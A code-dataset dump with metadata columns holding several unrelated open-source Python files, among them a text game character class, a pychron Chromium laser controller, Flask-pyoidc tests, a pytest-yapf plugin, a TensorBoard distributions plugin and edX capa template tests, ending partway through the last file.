repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
JasonDeving/python_game
|
character.py
|
1
|
1119
|
import random
from combat import Combat
class Character(Combat):
attack_limit = 10
experience = 0
base_hit_points = 10
def attack(self):
roll = random.randint(1, self.attack_limit)
if self.weapon == 'sword':
roll += 1
elif self.weapon == 'axe':
roll +=2
return roll > 4
def get_weapon(self):
weapon_choice = input("Weapon ([S]word, [A]xe, [B]ow): ").lower()
if weapon_choice in 'sab':
if weapon_choice == 's':
return 'sword'
elif weapon_choice == 'a':
return 'axe'
else:
return 'bow'
else:
return self.get_weapon()
def __init__(self, **kwargs):
self.name = input("Name: ")
self.weapon = self.get_weapon()
self.hit_points = self.base_hit_points
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return '{}, HP: {}, XP: {}'.format(self.name, self.hit_points, self.experience)
def rest(self):
if self.hit_points < self.base_hit_points:
self.hit_points += 1
def leveled_up(self):
return self.experience >= 5
|
mit
| -2,028,627,748,923,431,400 | 22.829787 | 83 | 0.572833 | false |
NMGRL/pychron
|
pychron/lasers/laser_managers/chromium_laser_manager.py
|
1
|
9853
|
# ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
import time
# ============= local library imports ==========================
from pychron.core.helpers.strtools import csv_to_floats
from pychron.experiment.utilities.position_regex import SCAN_REGEX
from pychron.lasers.laser_managers.ethernet_laser_manager import EthernetLaserManager
class ChromiumLaserManager(EthernetLaserManager):
stage_manager_id = 'chromium.pychron'
configuration_dir_name = 'chromium'
_alive = False
def setup_communicator(self):
com = super(ChromiumLaserManager, self).setup_communicator()
if self.communicator:
self.communicator.write_terminator='\n\r'
return com
def set_tray(self, t):
if self.stage_manager:
self.stage_manager.stage_map_name = t
def end_extract(self, *args, **kw):
self._ask('laser.stop')
self.info('ending extraction. set laser power to 0')
self.set_laser_power(0)
if self._patterning:
self.stop_pattern()
def fire_laser(self):
self.info('fire laser')
self._ask('laser.fire')
def extract(self, value, units=None, tol=0.1, fire_laser=True):
if units is None:
units = 'watts'
self.info('set laser output to {} {}'.format(value, units))
if units == 'watts':
ovalue = value
value = self.calculate_calibrated_power(value)
if value < 0:
self.warning('Consider changing you calibration curve. '
'{} watts converted to {}%. % must be positive'.format(ovalue, value))
value = 0
resp = self.set_laser_power(value)
if fire_laser:
time.sleep(1)
self.fire_laser()
try:
return abs(float(resp) - value) < tol
except BaseException:
pass
def set_laser_power(self, v):
return self._ask('laser.output {}'.format(v))
def enable_laser(self, **kw):
# self.ask('laser.enable ON')
self.enabled = True
def disable_laser(self):
self._ask('laser.stop')
self.enabled = False
def get_position(self):
x, y, z = self._x, self._y, self._z
xyz_microns = self._ask('stage.pos?')
if xyz_microns:
x, y, z = [float(v) / 1000. for v in xyz_microns.split(',')]
if self.stage_manager.use_sign_position_correction:
x = x * self.stage_manager.x_sign
y = y * self.stage_manager.y_sign
z = z * self.stage_manager.z_sign
return x, y, z
def linear_move(self, x, y, block=False, *args, **kw):
self._move_to_position((x, y), block=block)
def stop(self):
self._ask('stage.stop')
self._alive = False
self.update_position()
# private
def _stage_stop_button_fired(self):
self.stop()
def _fire_laser_button_fired(self):
if self._firing:
cmd = 'laser.stop'
else:
cmd = 'laser.fire'
self._firing = not self._firing
self._ask(cmd)
def _output_power_changed(self, new):
self.extract(new, self.units, fire_laser=False)
def _set_x(self, v):
if self._move_enabled:
self._alive = True
self._ask('stage.moveto {},{},{},{},{},{}'.format(v * 1000, self._y * 1000, self._z * 1000, 10, 10, 0))
self._single_axis_moving(v * 1000, 0)
def _set_y(self, v):
if self._move_enabled:
self._alive = True
self._ask('stage.moveto {},{},{},{},{},{}'.format(self._x * 1000, v * 1000, self._z * 1000, 10, 10, 0))
self._single_axis_moving(v * 1000, 1)
def _set_z(self, v):
if self._move_enabled:
self._alive = True
self._ask('stage.moveto {},{},{},{},{},{}'.format(self._x * 1000, self._y * 1000, v * 1000, 10, 10, 0))
self._single_axis_moving(v * 1000, 2)
def _single_axis_moving(self, v, axis):
def cmpfunc(xyz):
try:
if not self._alive:
return True
pos = float(xyz.split(',')[axis])
return abs(pos - v) > 2
except ValueError as e:
print('_moving exception {}'.format(e))
self._block(cmd='stage.pos?', cmpfunc=cmpfunc)
time.sleep(0.25)
self._alive = False
self.update_position()
def _move_to_position(self, pos, block=True, *args, **kw):
sm = self.stage_manager
try:
x, y = self._get_hole_xy(pos)
except ValueError:
return
z = self._z
xs = 5000
ys = 5000
zs = 100
self._alive = True
self.debug('pos={}, x={}, y={}'.format(pos, x, y))
xm = x * 1000
ym = y * 1000
zm = z * 1000
if sm.use_sign_position_correction:
xm *= sm.x_sign
ym *= sm.y_sign
zm *= sm.z_sign
cmd = 'stage.moveto {:0.0f},{:0.0f},{:0.0f},{:0.0f},{:0.0f},{:0.0f}'.format(xm, ym, zm, xs, ys, zs)
self.info('sending {}'.format(cmd))
self._ask(cmd)
time.sleep(1)
return self._moving(xm, ym, zm, block)
def _moving(self, xm, ym, zm, block=True):
r = True
if block:
time.sleep(0.05)
def cmpfunc(xyz):
try:
if not self._alive:
return True
ps = csv_to_floats(xyz)
return not all(abs(a - b) <= 10 for a, b in zip(ps, (xm, ym, zm)))
except ValueError as e:
print('_moving exception {}'.format(e))
r = self._block(cmd='stage.pos?', cmpfunc=cmpfunc, period=1)
self._alive = False
self.update_position()
return r
def _stage_manager_default(self):
args = dict(name='stage',
configuration_name='stage',
configuration_dir_name=self.configuration_dir_name,
parent=self)
return self._stage_manager_factory(args)
def _stage_manager_factory(self, args):
from pychron.lasers.stage_managers.chromium_stage_manager import ChromiumStageManager
self.stage_args = args
klass = ChromiumStageManager
sm = klass(**args)
sm.id = self.stage_manager_id
return sm
def _pattern_executor_default(self):
from pychron.lasers.pattern.pattern_executor import PatternExecutor
pm = PatternExecutor(application=self.application,
controller=self,
laser_manager=self)
return pm
class ChromiumCO2Manager(ChromiumLaserManager):
pass
class ChromiumDiodeManager(ChromiumLaserManager):
pass
def scans(cmd):
return 'Scans.{}'.format(cmd)
class ChromiumUVManager(ChromiumLaserManager):
configuration_dir_name = 'chromium_uv'
_active_scan = None
def active_scan_cmd(self, cmd):
return scans('{} {}'.format(cmd, self._active_scan))
def ask_active_scan(self, cmd):
return self._ask(self.active_scan_cmd(cmd))
def _opened_hook(self):
self._ask(scans('Status_Verbosity 1'))
def warmup(self, block=None):
if self._active_scan:
self._warmed = True
self.ask_active_scan('Run')
if block:
def func(r):
return r.lower() !='running: warming up laser...'
self._block(cmd=scans('Status?'), cmpfunc=func, timeout=120)
def extract(self, *args, **kw):
if self._active_scan:
if not self._warmed:
self.ask_active_scan('Run')
def func(r):
return str(r).strip().lower() !='idle: idle'
self._block(cmd=scans('Status?'), cmpfunc=func, timeout=kw.get('block', 300) or 300)
self._warmed=False
return True
else:
return super(ChromiumUVManager, self).extract(*args, **kw)
def _move_to_position(self, pos, *args, **kw):
# if position is a valid predefined scan list use it
# otherwise interpret as normal hole/x,y pos
scan_id = self._get_scan_id(pos)
if scan_id:
self._active_scan = scan_id
self.ask_active_scan('MoveTo')
def func(r):
return not bool(int(r))
self._block(cmd=self.active_scan_cmd('InPos?'), cmpfunc=func)
else:
self._active_scan = None
return super(ChromiumUVManager, self)._move_to_position(pos, *args, **kw)
def disable_laser(self):
self._ask(scans('Stop'))
super(ChromiumUVManager, self).disable_laser()
def _get_scan_id(self, pos):
m = SCAN_REGEX[0].match(pos)
if m:
return int(m.group('id')[1:])
return
# ============= EOF =============================================
|
apache-2.0
| 1,684,627,198,782,123,500 | 30.580128 | 115 | 0.533036 | false |
b52/lala
|
setup.py
|
1
|
1548
|
#!/usr/bin/env python
# Copyright (C) 2010 Oliver Mader <b52@reaktor42.de>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from setuptools import setup
setup(
name='lala',
version='0.1',
description='A slick yet powerful mpd web client',
author='Oliver Mader',
author_email='b52@reaktor42.de',
url='http://reaktor42.de/projects/lala',
license='MIT',
keywords='mpd lala',
install_requires=['python-mpd-twisted'],
packages=['lala'],
include_package_data=True,
platforms=['Independent']
)
|
mit
| 83,876,511,869,762,020 | 39.736842 | 79 | 0.742248 | false |
zamzterz/Flask-pyoidc
|
tests/test_pyoidc_facade.py
|
1
|
13038
|
import time
import base64
import pytest
import responses
from oic.oic import AuthorizationResponse, AccessTokenResponse, TokenErrorResponse, OpenIDSchema, \
AuthorizationErrorResponse
from urllib.parse import parse_qsl, urlparse
from flask_pyoidc.provider_configuration import ProviderConfiguration, ClientMetadata, ProviderMetadata, \
ClientRegistrationInfo
from flask_pyoidc.pyoidc_facade import PyoidcFacade, _ClientAuthentication
from .util import signed_id_token
REDIRECT_URI = 'https://rp.example.com/redirect_uri'
class TestPyoidcFacade(object):
PROVIDER_BASEURL = 'https://op.example.com'
PROVIDER_METADATA = ProviderMetadata(PROVIDER_BASEURL,
PROVIDER_BASEURL + '/auth',
PROVIDER_BASEURL + '/jwks')
CLIENT_METADATA = ClientMetadata('client1', 'secret1')
def test_registered_client_metadata_is_forwarded_to_pyoidc(self):
config = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA, client_metadata=self.CLIENT_METADATA)
facade = PyoidcFacade(config, REDIRECT_URI)
assert facade._client.registration_response
def test_no_registered_client_metadata_is_handled(self):
config = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_registration_info=ClientRegistrationInfo())
facade = PyoidcFacade(config, REDIRECT_URI)
assert not facade._client.registration_response
def test_is_registered(self):
unregistered = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_registration_info=ClientRegistrationInfo())
registered = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_metadata=self.CLIENT_METADATA)
assert PyoidcFacade(unregistered, REDIRECT_URI).is_registered() is False
assert PyoidcFacade(registered, REDIRECT_URI).is_registered() is True
@responses.activate
def test_register(self):
registration_endpoint = self.PROVIDER_BASEURL + '/register'
responses.add(responses.POST, registration_endpoint, json=self.CLIENT_METADATA.to_dict())
provider_metadata = self.PROVIDER_METADATA.copy(registration_endpoint=registration_endpoint)
unregistered = ProviderConfiguration(provider_metadata=provider_metadata,
client_registration_info=ClientRegistrationInfo())
facade = PyoidcFacade(unregistered, REDIRECT_URI)
facade.register()
assert facade.is_registered() is True
def test_authentication_request(self):
extra_user_auth_params = {'foo': 'bar', 'abc': 'xyz'}
config = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_metadata=self.CLIENT_METADATA,
auth_request_params=extra_user_auth_params)
state = 'test_state'
nonce = 'test_nonce'
facade = PyoidcFacade(config, REDIRECT_URI)
extra_lib_auth_params = {'foo': 'baz', 'qwe': 'rty'}
auth_request = facade.authentication_request(state, nonce, extra_lib_auth_params)
expected_auth_params = {
'scope': 'openid',
'response_type': 'code',
'client_id': self.CLIENT_METADATA['client_id'],
'redirect_uri': REDIRECT_URI,
'state': state,
'nonce': nonce
}
expected_auth_params.update(extra_user_auth_params)
expected_auth_params.update(extra_lib_auth_params)
assert auth_request.to_dict() == expected_auth_params
def test_parse_authentication_response(self):
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_metadata=self.CLIENT_METADATA),
REDIRECT_URI)
auth_code = 'auth_code-1234'
state = 'state-1234'
auth_response = AuthorizationResponse(**{'state': state, 'code': auth_code})
parsed_auth_response = facade.parse_authentication_response(auth_response.to_dict())
assert isinstance(parsed_auth_response, AuthorizationResponse)
assert parsed_auth_response.to_dict() == auth_response.to_dict()
def test_parse_authentication_response_handles_error_response(self):
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_metadata=self.CLIENT_METADATA),
REDIRECT_URI)
error_response = AuthorizationErrorResponse(**{'error': 'invalid_request', 'state': 'state-1234'})
parsed_auth_response = facade.parse_authentication_response(error_response)
assert isinstance(parsed_auth_response, AuthorizationErrorResponse)
assert parsed_auth_response.to_dict() == error_response.to_dict()
@responses.activate
def test_parse_authentication_response_preserves_id_token_jwt(self):
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_metadata=self.CLIENT_METADATA),
REDIRECT_URI)
state = 'state-1234'
now = int(time.time())
id_token, id_token_signing_key = signed_id_token({
'iss': self.PROVIDER_METADATA['issuer'],
'sub': 'test_sub',
'aud': 'client1',
'exp': now + 1,
'iat': now
})
responses.add(responses.GET,
self.PROVIDER_METADATA['jwks_uri'],
json={'keys': [id_token_signing_key.serialize()]})
auth_response = AuthorizationResponse(**{'state': state, 'id_token': id_token})
parsed_auth_response = facade.parse_authentication_response(auth_response)
assert isinstance(parsed_auth_response, AuthorizationResponse)
assert parsed_auth_response['state'] == state
assert parsed_auth_response['id_token_jwt'] == id_token
@pytest.mark.parametrize('request_func,expected_token_request', [
(
lambda facade: facade.exchange_authorization_code('auth-code'),
{
'grant_type': 'authorization_code',
'code': 'auth-code',
'redirect_uri': REDIRECT_URI
}
),
(
lambda facade: facade.refresh_token('refresh-token'),
{
'grant_type': 'refresh_token',
'refresh_token': 'refresh-token',
'redirect_uri': REDIRECT_URI
}
)
])
@responses.activate
def test_token_request(self, request_func, expected_token_request):
token_endpoint = self.PROVIDER_BASEURL + '/token'
now = int(time.time())
id_token_claims = {
'iss': self.PROVIDER_METADATA['issuer'],
'sub': 'test_user',
'aud': [self.CLIENT_METADATA['client_id']],
'exp': now + 1,
'iat': now,
'nonce': 'test_nonce'
}
id_token_jwt, id_token_signing_key = signed_id_token(id_token_claims)
token_response = AccessTokenResponse(access_token='test_access_token',
token_type='Bearer',
id_token=id_token_jwt)
responses.add(responses.POST, token_endpoint, json=token_response.to_dict())
provider_metadata = self.PROVIDER_METADATA.copy(token_endpoint=token_endpoint)
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=provider_metadata,
client_metadata=self.CLIENT_METADATA),
REDIRECT_URI)
responses.add(responses.GET,
self.PROVIDER_METADATA['jwks_uri'],
json={'keys': [id_token_signing_key.serialize()]})
token_response = request_func(facade)
assert isinstance(token_response, AccessTokenResponse)
expected_token_response = token_response.to_dict()
expected_token_response['id_token'] = id_token_claims
expected_token_response['id_token_jwt'] = id_token_jwt
assert token_response.to_dict() == expected_token_response
token_request = dict(parse_qsl(responses.calls[0].request.body))
assert token_request == expected_token_request
@responses.activate
def test_token_request_handles_error_response(self):
token_endpoint = self.PROVIDER_BASEURL + '/token'
token_response = TokenErrorResponse(error='invalid_request', error_description='test error description')
responses.add(responses.POST, token_endpoint, json=token_response.to_dict(), status=400)
provider_metadata = self.PROVIDER_METADATA.copy(token_endpoint=token_endpoint)
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=provider_metadata,
client_metadata=self.CLIENT_METADATA),
REDIRECT_URI)
assert facade.exchange_authorization_code('1234') == token_response
def test_token_request_handles_missing_provider_token_endpoint(self):
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_metadata=self.CLIENT_METADATA),
REDIRECT_URI)
assert facade.exchange_authorization_code('1234') is None
@pytest.mark.parametrize('userinfo_http_method', [
'GET',
'POST'
])
@responses.activate
def test_configurable_userinfo_endpoint_method_is_used(self, userinfo_http_method):
userinfo_endpoint = self.PROVIDER_BASEURL + '/userinfo'
userinfo_response = OpenIDSchema(sub='user1')
responses.add(userinfo_http_method, userinfo_endpoint, json=userinfo_response.to_dict())
provider_metadata = self.PROVIDER_METADATA.copy(userinfo_endpoint=userinfo_endpoint)
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=provider_metadata,
client_metadata=self.CLIENT_METADATA,
userinfo_http_method=userinfo_http_method),
REDIRECT_URI)
assert facade.userinfo_request('test_token') == userinfo_response
def test_no_userinfo_request_is_made_if_no_userinfo_http_method_is_configured(self):
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_metadata=self.CLIENT_METADATA,
userinfo_http_method=None),
REDIRECT_URI)
assert facade.userinfo_request('test_token') is None
def test_no_userinfo_request_is_made_if_no_userinfo_endpoint_is_configured(self):
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
client_metadata=self.CLIENT_METADATA),
REDIRECT_URI)
assert facade.userinfo_request('test_token') is None
def test_no_userinfo_request_is_made_if_no_access_token(self):
provider_metadata = self.PROVIDER_METADATA.copy(userinfo_endpoint=self.PROVIDER_BASEURL + '/userinfo')
facade = PyoidcFacade(ProviderConfiguration(provider_metadata=provider_metadata,
client_metadata=self.CLIENT_METADATA),
REDIRECT_URI)
assert facade.userinfo_request(None) is None
class TestClientAuthentication(object):
CLIENT_ID = 'client1'
CLIENT_SECRET = 'secret1'
@property
def basic_auth(self):
credentials = '{}:{}'.format(self.CLIENT_ID, self.CLIENT_SECRET)
return 'Basic {}'.format(base64.urlsafe_b64encode(credentials.encode('utf-8')).decode('utf-8'))
@pytest.fixture(autouse=True)
def setup(self):
self.client_auth = _ClientAuthentication(self.CLIENT_ID, self.CLIENT_SECRET)
def test_client_secret_basic(self):
request = {}
headers = self.client_auth('client_secret_basic', request)
assert headers == {'Authorization': self.basic_auth}
assert request == {}
def test_client_secret_post(self):
request = {}
headers = self.client_auth('client_secret_post', request)
assert headers is None
assert request == {'client_id': self.CLIENT_ID, 'client_secret': self.CLIENT_SECRET}
def test_defaults_to_client_secret_basic(self):
assert self.client_auth('invalid_client_auth_method', {}) == self.client_auth('client_secret_basic', {})
|
apache-2.0
| -6,834,126,658,428,720,000 | 48.954023 | 118 | 0.613208 | false |
django-stars/pytest-yapf
|
pytest_yapf.py
|
1
|
2014
|
import os
from yapf.yapflib import file_resources
from yapf.yapflib.style import CreateStyleFromConfig
from yapf.yapflib.yapf_api import FormatFile
import pytest
def pytest_addoption(parser):
group = parser.getgroup('yapf')
group.addoption('--yapf', action='store_true', help='run yapf on *.py files.')
group.addoption('--yapfdiff', action='store_true', help='show diff of yapf output.')
group.addoption('--yapfstyle', action='store', dest='yapfstyle', default=None, help='style to be used by yapf.')
def pytest_collect_file(path, parent):
config = parent.config
if config.option.yapf and path.ext == '.py':
return YapfItem(path, parent)
class YapfError(Exception):
pass
class YapfItem(pytest.Item, pytest.File):
def __init__(self, path, parent):
super(YapfItem, self).__init__(path, parent)
self.path = str(path)
self.show_diff = self.parent.config.option.yapfdiff is True
self.style = self.parent.config.getoption('yapfstyle') or file_resources.GetDefaultStyleForDir(self.path)
def runtest(self):
filename = self.path
error = None
try:
diff, encoding, is_changed = FormatFile(self.path, style_config=self.style, print_diff=True)
except BaseException as e:
raise BaseException(e)
if is_changed:
file_lines = diff.split('\n')
lines_added = len([x for x in file_lines if x.startswith('+')])
lines_removed = len([x for x in file_lines if x.startswith('-')])
message = "ERROR: %s Code formatting is not correct." % (filename, )
message = "%s\n Diff: -%s/+%s lines" % (message, lines_removed, lines_added)
if self.show_diff:
message = "%s\n\n%s" % (message, diff)
raise YapfError(message)
def repr_failure(self, excinfo):
if excinfo.errisinstance(YapfError):
return excinfo.value.args[0]
return super().repr_failure(excinfo)
|
mit
| 5,730,433,035,302,565,000 | 34.333333 | 116 | 0.634062 | false |
tupes/School
|
CS333/utilities.py
|
1
|
1130
|
from string import ascii_letters
import re
NONLETTERS_PATTERN = re.compile('[^A-Z]')
def removeTextNonLetters(message):
return NONLETTERS_PATTERN.sub('', message.upper())
def removeBinaryNonLetters(message):
return ''.join([chr(b).upper() for b in message if chr(b) in ascii_letters])
def getInBothCount(s1, s2):
return len({x for x in s1} & {y for y in s2})
# ############################
# UTILITY CONVERSION FUNCTIONS
# ############################
hexDigits = "0123456789ABCDEF"
def getHexString(_string):
return hex(ord(_string))
def getPaddedHexString(_int):
h = hex(_int)
return h if len(h) > 3 else '0x0' + h[-1]
def getChar(_hex):
return chr(int(_hex, 16))
def getHigherHex(string):
return getHex(string[2])
def getLowerHex(string):
return getHex(string[3])
def getHex(char):
return int("0x0" + char, 16)
def convertToHex(ch, cl):
return "0x"+ hexDigits[ch] + hexDigits[cl]
def getBinary(char):
return bytes.fromhex(hex(ord(char))[2:])
def getBinary(char):
return bytes.fromhex(char[2:])
def getSymbol(symbol):
return symbol if type(symbol) == str else chr(symbol)
|
gpl-3.0
| 2,740,902,373,908,748,300 | 20.730769 | 77 | 0.653982 | false |
shakedel/tensorboard
|
tensorboard/plugins/distribution/distributions_plugin.py
|
1
|
2702
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The TensorBoard Distributions (a.k.a. compressed histograms) plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from werkzeug import wrappers
from tensorboard.backend import http_util
from tensorboard.backend.event_processing import event_accumulator
from tensorboard.plugins import base_plugin
_PLUGIN_PREFIX_ROUTE = event_accumulator.COMPRESSED_HISTOGRAMS
class DistributionsPlugin(base_plugin.TBPlugin):
"""Distributions Plugin for TensorBoard."""
plugin_name = _PLUGIN_PREFIX_ROUTE
def __init__(self, context):
"""Instantiates DistributionsPlugin via TensorBoard core.
Args:
context: A base_plugin.TBContext instance.
"""
self._multiplexer = context.multiplexer
def get_plugin_apps(self):
return {
'/distributions': self.distributions_route,
'/tags': self.tags_route,
}
def is_active(self):
"""This plugin is active iff any run has at least one relevant tag."""
return bool(self._multiplexer) and any(self.index_impl().values())
def index_impl(self):
return {
run_name: run_data[event_accumulator.COMPRESSED_HISTOGRAMS]
for (run_name, run_data) in self._multiplexer.Runs().items()
if event_accumulator.COMPRESSED_HISTOGRAMS in run_data
}
def distributions_impl(self, tag, run):
"""Result of the form `(body, mime_type)`."""
values = self._multiplexer.CompressedHistograms(run, tag)
return (values, 'application/json')
@wrappers.Request.application
def tags_route(self, request):
index = self.index_impl()
return http_util.Respond(request, index, 'application/json')
@wrappers.Request.application
def distributions_route(self, request):
"""Given a tag and single run, return array of compressed histograms."""
tag = request.args.get('tag')
run = request.args.get('run')
(body, mime_type) = self.distributions_impl(tag, run)
return http_util.Respond(request, body, mime_type)
|
apache-2.0
| 3,228,192,643,375,584,000 | 34.552632 | 80 | 0.699852 | false |
alip/pinktrace
|
python/TEST_socket.py
|
1
|
1433
|
#!/usr/bin/env python
# coding: utf-8
import os, signal, socket, sys, unittest
sys.path.insert(0, '.')
import pinktrace
import pinktrace.event
import pinktrace.socket
import pinktrace.syscall
import pinktrace.trace
UNAME = os.uname()
class TestSocket_01_Invalid(unittest.TestCase):
def test_01_name(self):
if UNAME[0] != 'Linux': return
self.assertRaises(TypeError, pinktrace.socket.name)
def test_02_decode_call(self):
if UNAME[0] != 'Linux': return
self.assertRaises(TypeError, pinktrace.socket.decode_call)
self.assertRaises(TypeError, pinktrace.socket.decode_call, 'pink')
self.assertRaises(ValueError, pinktrace.socket.decode_call, 0, 13)
def test_03_decode_fd(self):
if UNAME[0] != 'Linux': return
self.assertRaises(TypeError, pinktrace.socket.decode_fd)
self.assertRaises(IndexError, pinktrace.socket.decode_fd, 0, pinktrace.syscall.MAX_ARGS)
self.assertRaises(ValueError, pinktrace.socket.decode_fd, 0, 1, 13)
def test_04_decode_address(self):
self.assertRaises(TypeError, pinktrace.socket.decode_address)
self.assertRaises(TypeError, pinktrace.socket.decode_address, 0)
self.assertRaises(IndexError, pinktrace.socket.decode_address, 0, pinktrace.syscall.MAX_ARGS)
self.assertRaises(ValueError, pinktrace.socket.decode_address, 0, 1, 13)
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
| -1,387,399,357,694,751,200 | 32.325581 | 101 | 0.701326 | false |
vismartltd/edx-platform
|
common/lib/capa/capa/tests/test_input_templates.py
|
1
|
39385
|
"""
Tests for the logic in input type mako templates.
"""
import unittest
import capa
import os.path
import json
from lxml import etree
from mako.template import Template as MakoTemplate
from mako import exceptions
from capa.inputtypes import Status
class TemplateError(Exception):
"""
Error occurred while rendering a Mako template.
"""
pass
class TemplateTestCase(unittest.TestCase):
"""
Utilitites for testing templates.
"""
# Subclasses override this to specify the file name of the template
# to be loaded from capa/templates.
# The template name should include the .html extension:
# for example: choicegroup.html
TEMPLATE_NAME = None
def setUp(self):
"""
Load the template under test.
"""
super(TemplateTestCase, self).setUp()
capa_path = capa.__path__[0]
self.template_path = os.path.join(capa_path,
'templates',
self.TEMPLATE_NAME)
with open(self.template_path) as f:
self.template = MakoTemplate(f.read())
def render_to_xml(self, context_dict):
"""
Render the template using the `context_dict` dict.
Returns an `etree` XML element.
"""
# add dummy STATIC_URL to template context
context_dict.setdefault("STATIC_URL", "/dummy-static/")
try:
xml_str = self.template.render_unicode(**context_dict)
except:
raise TemplateError(exceptions.text_error_template().render())
# Attempt to construct an XML tree from the template
# This makes it easy to use XPath to make assertions, rather
# than dealing with a string.
# We modify the string slightly by wrapping it in <test>
# tags, to ensure it has one root element.
try:
xml = etree.fromstring("<test>" + xml_str + "</test>")
except Exception as exc:
raise TemplateError("Could not parse XML from '{0}': {1}".format(
xml_str, str(exc)))
else:
return xml
def assert_has_xpath(self, xml_root, xpath, context_dict, exact_num=1):
"""
Asserts that the xml tree has an element satisfying `xpath`.
`xml_root` is an etree XML element
`xpath` is an XPath string, such as `'/foo/bar'`
`context` is used to print a debugging message
`exact_num` is the exact number of matches to expect.
"""
message = ("XML does not have %d match(es) for xpath '%s'\nXML: %s\nContext: %s"
% (exact_num, str(xpath), etree.tostring(xml_root), str(context_dict)))
self.assertEqual(len(xml_root.xpath(xpath)), exact_num, msg=message)
def assert_no_xpath(self, xml_root, xpath, context_dict):
"""
Asserts that the xml tree does NOT have an element
satisfying `xpath`.
`xml_root` is an etree XML element
`xpath` is an XPath string, such as `'/foo/bar'`
`context` is used to print a debugging message
"""
self.assert_has_xpath(xml_root, xpath, context_dict, exact_num=0)
def assert_has_text(self, xml_root, xpath, text, exact=True):
"""
Find the element at `xpath` in `xml_root` and assert
that its text is `text`.
`xml_root` is an etree XML element
`xpath` is an XPath string, such as `'/foo/bar'`
`text` is the expected text that the element should contain
If multiple elements are found, checks the first one.
If no elements are found, the assertion fails.
"""
element_list = xml_root.xpath(xpath)
self.assertTrue(len(element_list) > 0,
"Could not find element at '%s'" % str(xpath))
if exact:
self.assertEqual(text, element_list[0].text)
else:
self.assertIn(text, element_list[0].text)
class ChoiceGroupTemplateTest(TemplateTestCase):
"""
Test mako template for `<choicegroup>` input.
"""
TEMPLATE_NAME = 'choicegroup.html'
def setUp(self):
choices = [('1', 'choice 1'), ('2', 'choice 2'), ('3', 'choice 3')]
self.context = {'id': '1',
'choices': choices,
'status': Status('correct'),
'question_label': 'test',
'label': 'test',
'input_type': 'checkbox',
'name_array_suffix': '1',
'value': '3'}
super(ChoiceGroupTemplateTest, self).setUp()
def test_problem_marked_correct(self):
"""
Test conditions under which the entire problem
(not a particular option) is marked correct.
"""
self.context['status'] = Status('correct')
self.context['input_type'] = 'checkbox'
self.context['value'] = ['1', '2']
self.context['question_label'] = ['']
# Should mark the entire problem correct
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status correct']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml, "//label[@class='choicegroup_incorrect']",
self.context)
self.assert_no_xpath(xml, "//label[@class='choicegroup_correct']",
self.context)
def test_problem_marked_incorrect(self):
"""
Test all conditions under which the entire problem
(not a particular option) is marked incorrect.
"""
conditions = [
{'status': Status('incorrect'), 'input_type': 'radio', 'value': ''},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': []},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': ['2']},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': ['2', '3']},
{'status': Status('incomplete'), 'input_type': 'radio', 'value': ''},
